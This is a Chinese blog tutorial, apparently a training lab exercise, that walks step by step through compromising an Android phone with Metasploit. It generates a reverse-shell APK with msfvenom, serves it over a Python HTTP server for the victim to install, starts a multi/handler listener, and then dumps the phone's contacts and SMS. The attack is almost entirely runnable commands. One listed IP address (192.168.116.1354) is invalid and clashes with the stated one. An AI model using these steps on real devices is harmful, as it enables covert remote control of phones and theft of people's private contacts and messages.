第二天-03-安卓手机的入侵实验

本文详细介绍了如何在Kali Linux环境下,通过ping测试网络连通性,然后使用msfvenom生成连接Kali的apk,通过HTTP服务将apk发送到安卓设备并安装,最后在Kali上设置监听并执行命令,如查看通讯录。整个过程涉及网络通信、安卓安全和渗透测试技术。
摘要由CSDN通过智能技术生成

安卓手机入侵实验

要求:

电脑主机与手机模拟器或者真机在当前环境下,网络是畅通的,相互之间可以进行通信。

如何进行测试网络环境:

我们首先需要确定IP。

linux通过终端命令 # ip a 或者 #ifconfig

windown下:win加r输入cmd调出终端,使用ipconfig查看ip地址。

kali下:

在这里插入图片描述

Android模拟器下:

在这里插入图片描述

在这里插入图片描述

在安卓真机下:打开wifi

在这里插入图片描述

操作:

知道IP后使用ping命令测试是否可以连通。

终端下命令:

​ ping 目标主机ip

在这里插入图片描述

测试步骤:

可以ping通后开始进行入侵测试:

  1. 使用msfvenom生成一个连接kali主机的apk安卓应用

lhost=192.168.1.10 (这是Kali的IP),lport=4444 (默认4444)端口,1.apk(生成apk的名字)

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.116.1354 lport=4444 R > 1.apk

在这里插入图片描述

home下点开test

apk安卓应用上传到安卓手机

步骤一:kali开启HTTP服务80端口

命令:

​ python3 -m http.server 80

在这里插入图片描述

​ 步骤二:安卓下通过ip访问网站下载

​ 模拟器下有bug可以通过

终端下命令:切换路径 cd /sdcard

开始下载 wget ip/apk文件

真机可以直接浏览器下输入ip地址访问

安卓下载安装完成并且给与程序权限

在这里插入图片描述

​ 3. 回到kali

​ 输入命令启动msfconsole

在这里插入图片描述

  1. 选择工具模块

    命令:

    use exploit/multi/handler

    在这里插入图片描述

    1. 设置攻击载荷

      set payload android/meterpreter/reverse_tcp

在这里插入图片描述

  1. 设置监听方ip地址(kali的IP地址)

    set LHOST ip

    在这里插入图片描述

  2. 设置端口

    set LPORT 4444

    在这里插入图片描述

  3. run运行

  4. 回到安卓点击安装的程序

  5. kali下可以执行操作了

    查看目标安卓手机通讯录:dump_contacts

    在这里插入图片描述

完成后的文件保存在home,目录下

​ 查看目标手机短信 :dump_sms

在这里插入图片描述

至此操作完成

补充:

可以使用help 查看命令帮助

  • 1
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿凯6666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值